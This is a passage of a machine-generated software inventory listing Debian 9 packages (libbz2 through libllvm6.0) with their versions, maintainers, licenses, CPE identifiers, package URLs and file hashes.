1.0.6-8.1 GPL-2.0-only cpe:2.3:a:libbz2-1.0:libbz2-1.0:1.0.6-8.1:*:*:*:*:*:*:* pkg:deb/debian/libbz2-1.0@1.0.6-8.1?arch=amd64&upstream=bzip2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libbz2-1.0:libbz2_1.0:1.0.6-8.1:*:*:*:*:*:*:* cpe:2.3:a:libbz2_1.0:libbz2-1.0:1.0.6-8.1:*:*:*:*:*:*:* cpe:2.3:a:libbz2_1.0:libbz2_1.0:1.0.6-8.1:*:*:*:*:*:*:* cpe:2.3:a:libbz2:libbz2-1.0:1.0.6-8.1:*:*:*:*:*:*:* cpe:2.3:a:libbz2:libbz2_1.0:1.0.6-8.1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libbz2-1.0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libbz2-1.0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 96 bzip2 GNU Libc Maintainers <debian-glibc@lists.debian.org> libc-bin 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libc-bin:libc-bin:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/libc-bin@2.24-11+deb9u4?arch=amd64&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libc-bin:libc_bin:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc_bin:libc-bin:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc_bin:libc_bin:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-bin:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_bin:2.24-11\+deb9u4:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libc-bin/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libc-bin.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libc-bin.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3366 glibc GNU Libc Maintainers <debian-glibc@lists.debian.org> libc-l10n 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libc-l10n:libc-l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/libc-l10n@2.24-11+deb9u4?arch=all&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libc-l10n:libc_l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc_l10n:libc-l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc_l10n:libc_l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /usr/share/doc/libc-l10n/copyright sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /var/lib/dpkg/info/libc-l10n.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 4211 glibc GNU Libc Maintainers <debian-glibc@lists.debian.org> libc6 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libc6:libc6:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/libc6@2.24-11+deb9u4?arch=amd64&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libc6/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libc6:amd64.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libc6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 10686 glibc Pierre Chifflier <pollux@debian.org> libcap-ng0 0.7.7-3+b1 GPL-2.0-only GPL-3.0-only LGPL-2.1-only cpe:2.3:a:libcap-ng0:libcap-ng0:0.7.7-3\+b1:*:*:*:*:*:*:* pkg:deb/debian/libcap-ng0@0.7.7-3+b1?arch=amd64&upstream=libcap-ng%400.7.7-3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libcap-ng0:libcap_ng0:0.7.7-3\+b1:*:*:*:*:*:*:* cpe:2.3:a:libcap_ng0:libcap-ng0:0.7.7-3\+b1:*:*:*:*:*:*:* cpe:2.3:a:libcap_ng0:libcap_ng0:0.7.7-3\+b1:*:*:*:*:*:*:* cpe:2.3:a:libcap:libcap-ng0:0.7.7-3\+b1:*:*:*:*:*:*:* cpe:2.3:a:libcap:libcap_ng0:0.7.7-3\+b1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libcap-ng0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libcap-ng0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 43 libcap-ng 0.7.7-3 Theodore Y. Ts'o <tytso@mit.edu> libcomerr2 1.43.4-2+deb9u2 cpe:2.3:a:libcomerr2:libcomerr2:1.43.4-2\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libcomerr2@1.43.4-2+deb9u2?arch=amd64&upstream=e2fsprogs&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libcomerr2/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libcomerr2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 84 e2fsprogs Debian Berkeley DB Group <pkg-db-devel@lists.alioth.debian.org> libdb5.3 5.3.28-12+deb9u1 cpe:2.3:a:libdb5.3:libdb5.3:5.3.28-12\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libdb5.3@5.3.28-12+deb9u1?arch=amd64&upstream=db5.3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libdb5.3/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libdb5.3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1814 db5.3 Debian Install System Team <debian-boot@lists.debian.org> libdebconfclient0 0.227 cpe:2.3:a:libdebconfclient0:libdebconfclient0:0.227:*:*:*:*:*:*:* pkg:deb/debian/libdebconfclient0@0.227?arch=amd64&upstream=cdebconf&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libdebconfclient0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libdebconfclient0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 67 cdebconf LLVM Packaging Team <pkg-llvm-team@lists.alioth.debian.org> libedit2 3.1-20160903-3 cpe:2.3:a:libedit2:libedit2:3.1-20160903-3:*:*:*:*:*:*:* pkg:deb/debian/libedit2@3.1-20160903-3?arch=amd64&upstream=libedit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libedit2/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libedit2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 241 libedit Debian util-linux Maintainers <ah-util-linux@debian.org> libfdisk1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libfdisk1:libfdisk1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libfdisk1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libfdisk1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libfdisk1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 469 util-linux Debian GCC Maintainers <debian-gcc@lists.debian.org> libffi6 3.2.1-6 GPL cpe:2.3:a:libffi6:libffi6:3.2.1-6:*:*:*:*:*:*:* pkg:deb/debian/libffi6@3.2.1-6?arch=amd64&upstream=libffi&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libffi6/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libffi6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 56 libffi Debian GCC Maintainers <debian-gcc@lists.debian.org> libgcc1 1:6.3.0-18+deb9u1 Artistic GFDL-1.2-only GPL GPL-2.0-only GPL-3.0-only cpe:2.3:a:libgcc1:libgcc1:1\:6.3.0-18\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libgcc1@1:6.3.0-18+deb9u1?arch=amd64&upstream=gcc-6%406.3.0-18+deb9u1&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gcc-6-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libgcc1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 108 gcc-6 6.3.0-18+deb9u1 Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libgcrypt20 1.7.6-2+deb9u4 GPL-2.0-only LGPL cpe:2.3:a:libgcrypt20:libgcrypt20:1.7.6-2\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/libgcrypt20@1.7.6-2+deb9u4?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libgcrypt20/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libgcrypt20:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1266 Debian QA Group <packages@qa.debian.org> libgdbm3 1.8.3-14 GPL-2.0-only cpe:2.3:a:libgdbm3:libgdbm3:1.8.3-14:*:*:*:*:*:*:* pkg:deb/debian/libgdbm3@1.8.3-14?arch=amd64&upstream=gdbm&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libgdbm3/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libgdbm3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 68 gdbm Debian Science Team <debian-science-maintainers@lists.alioth.debian.org> libgmp10 2:6.1.2+dfsg-1+deb9u1 GPL GPL-2.0-only GPL-3.0-only LGPL-3.0-only cpe:2.3:a:libgmp10:libgmp10:2\:6.1.2\+dfsg-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libgmp10@2:6.1.2+dfsg-1+deb9u1?arch=amd64&upstream=gmp&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libgmp10/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libgmp10:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 568 gmp Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libgnutls30 3.5.8-5+deb9u6 CC0 GFDL-1.3-only GPL GPL-3.0-only LGPL LGPL-3.0-only LGPL2.1 The cpe:2.3:a:libgnutls30:libgnutls30:3.5.8-5\+deb9u6:*:*:*:*:*:*:* pkg:deb/debian/libgnutls30@3.5.8-5+deb9u6?arch=amd64&upstream=gnutls28&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libgnutls30/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libgnutls30:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2429 gnutls28 Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> libgpg-error0 1.26-2 GPL-2.1+ LGPL-2.1-only cpe:2.3:a:libgpg-error0:libgpg-error0:1.26-2:*:*:*:*:*:*:* pkg:deb/debian/libgpg-error0@1.26-2?arch=amd64&upstream=libgpg-error&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libgpg-error0:libgpg_error0:1.26-2:*:*:*:*:*:*:* cpe:2.3:a:libgpg_error0:libgpg-error0:1.26-2:*:*:*:*:*:*:* cpe:2.3:a:libgpg_error0:libgpg_error0:1.26-2:*:*:*:*:*:*:* cpe:2.3:a:libgpg:libgpg-error0:1.26-2:*:*:*:*:*:*:* cpe:2.3:a:libgpg:libgpg_error0:1.26-2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libgpg-error0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libgpg-error0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 572 libgpg-error Sam Hartman <hartmans@debian.org> libgssapi-krb5-2 1.15-1+deb9u3 GPL-2.0-only cpe:2.3:a:libgssapi-krb5-2:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libgssapi-krb5-2@1.15-1+deb9u3?arch=amd64&upstream=krb5&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libgssapi-krb5-2:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi_krb5_2:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi_krb5_2:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi-krb5:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi-krb5:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi_krb5:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi_krb5:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi:libgssapi-krb5-2:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libgssapi:libgssapi_krb5_2:1.15-1\+deb9u3:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libgssapi-krb5-2/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libgssapi-krb5-2:amd64.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libgssapi-krb5-2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 423 krb5 Magnus Holmgren <holmgren@debian.org> libhogweed4 3.3-1+deb9u1 GAP GPL GPL-2.0-only GPL-2.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-or-later other public-domain cpe:2.3:a:libhogweed4:libhogweed4:3.3-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libhogweed4@3.3-1+deb9u1?arch=amd64&upstream=nettle&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libnettle6/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libhogweed4:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 232 nettle Laszlo Boszormenyi (GCS) <gcs@debian.org> libicu57 57.1-6+deb9u5 cpe:2.3:a:libicu57:libicu57:57.1-6\+deb9u5:*:*:*:*:*:*:* pkg:deb/debian/libicu57@57.1-6+deb9u5?arch=amd64&upstream=icu&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libicu57/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libicu57:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 30043 icu Debian Libidn Team <help-libidn@gnu.org> libidn11 1.33-1+deb9u1 GAP GFDL-1.3-only GFDL-1.3+ GPL-2.0-only GPL-3.0-only GPL-3.0-or-later LGPL-2.0-only LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later cpe:2.3:a:libidn11:libidn11:1.33-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libidn11@1.33-1+deb9u1?arch=amd64&upstream=libidn&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libidn11/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libidn11:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 307 libidn Debian Perl Group <pkg-perl-maintainers@lists.alioth.debian.org> libjson-perl 2.90-1 Artistic GPL-1.0-only GPL-1.0-or-later cpe:2.3:a:libjson-perl:libjson-perl:2.90-1:*:*:*:*:*:*:* pkg:deb/debian/libjson-perl@2.90-1?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libjson-perl:libjson_perl:2.90-1:*:*:*:*:*:*:* cpe:2.3:a:libjson_perl:libjson-perl:2.90-1:*:*:*:*:*:*:* cpe:2.3:a:libjson_perl:libjson_perl:2.90-1:*:*:*:*:*:*:* cpe:2.3:a:libjson:libjson-perl:2.90-1:*:*:*:*:*:*:* cpe:2.3:a:libjson:libjson_perl:2.90-1:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libjson-perl/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libjson-perl.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 229 Sam Hartman <hartmans@debian.org> libk5crypto3 1.15-1+deb9u3 GPL-2.0-only cpe:2.3:a:libk5crypto3:libk5crypto3:1.15-1\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libk5crypto3@1.15-1+deb9u3?arch=amd64&upstream=krb5&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libk5crypto3/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libk5crypto3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 311 krb5 Christian Kastner <ckk@debian.org> libkeyutils1 1.5.9-9 GPL-2.0-only GPL-2.0-or-later LGPL-2.0-only LGPL-2.0-or-later cpe:2.3:a:libkeyutils1:libkeyutils1:1.5.9-9:*:*:*:*:*:*:* pkg:deb/debian/libkeyutils1@1.5.9-9?arch=amd64&upstream=keyutils&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libkeyutils1/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libkeyutils1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 36 keyutils Sam Hartman <hartmans@debian.org> libkrb5-3 1.15-1+deb9u3 GPL-2.0-only cpe:2.3:a:libkrb5-3:libkrb5-3:1.15-1\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libkrb5-3@1.15-1+deb9u3?arch=amd64&upstream=krb5&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libkrb5-3:libkrb5_3:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libkrb5_3:libkrb5-3:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libkrb5_3:libkrb5_3:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libkrb5:libkrb5-3:1.15-1\+deb9u3:*:*:*:*:*:*:* cpe:2.3:a:libkrb5:libkrb5_3:1.15-1\+deb9u3:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libkrb5-3/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libkrb5-3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1026 krb5 Sam Hartman <hartmans@debian.org> libkrb5support0 1.15-1+deb9u3 GPL-2.0-only cpe:2.3:a:libkrb5support0:libkrb5support0:1.15-1\+deb9u3:*:*:*:*:*:*:* pkg:deb/debian/libkrb5support0@1.15-1+deb9u3?arch=amd64&upstream=krb5&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libkrb5support0/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libkrb5support0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 159 krb5 Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libksba8 1.3.5-2 GPL-3.0-only cpe:2.3:a:libksba8:libksba8:1.3.5-2:*:*:*:*:*:*:* pkg:deb/debian/libksba8@1.3.5-2?arch=amd64&upstream=libksba&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libksba8/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libksba8:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 264 libksba Debian OpenLDAP Maintainers <pkg-openldap-devel@lists.alioth.debian.org> libldap-2.4-2 2.4.44+dfsg-5+deb9u8 cpe:2.3:a:libldap-2.4-2:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* pkg:deb/debian/libldap-2.4-2@2.4.44+dfsg-5+deb9u8?arch=amd64&upstream=openldap&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libldap-2.4-2:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_2.4_2:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_2.4_2:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap-2.4:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap-2.4:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_2.4:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_2.4:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap:libldap-2.4-2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap:libldap_2.4_2:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libldap-2.4-2/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libldap-2.4-2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 510 openldap Debian OpenLDAP Maintainers <pkg-openldap-devel@lists.alioth.debian.org> libldap-common 2.4.44+dfsg-5+deb9u8 cpe:2.3:a:libldap-common:libldap-common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* pkg:deb/debian/libldap-common@2.4.44+dfsg-5+deb9u8?arch=all&upstream=openldap&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libldap-common:libldap_common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_common:libldap-common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap_common:libldap_common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap:libldap-common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* cpe:2.3:a:libldap:libldap_common:2.4.44\+dfsg-5\+deb9u8:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libldap-common/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libldap-common.conffiles sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libldap-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 109 openldap LLVM Packaging Team <pkg-llvm-team@lists.alioth.debian.org> libllvm6.0 1:6.0-1~bpo9+1 ARM Apple BSD-3-Clause BSD-3-Clause Expat LLVM MIT 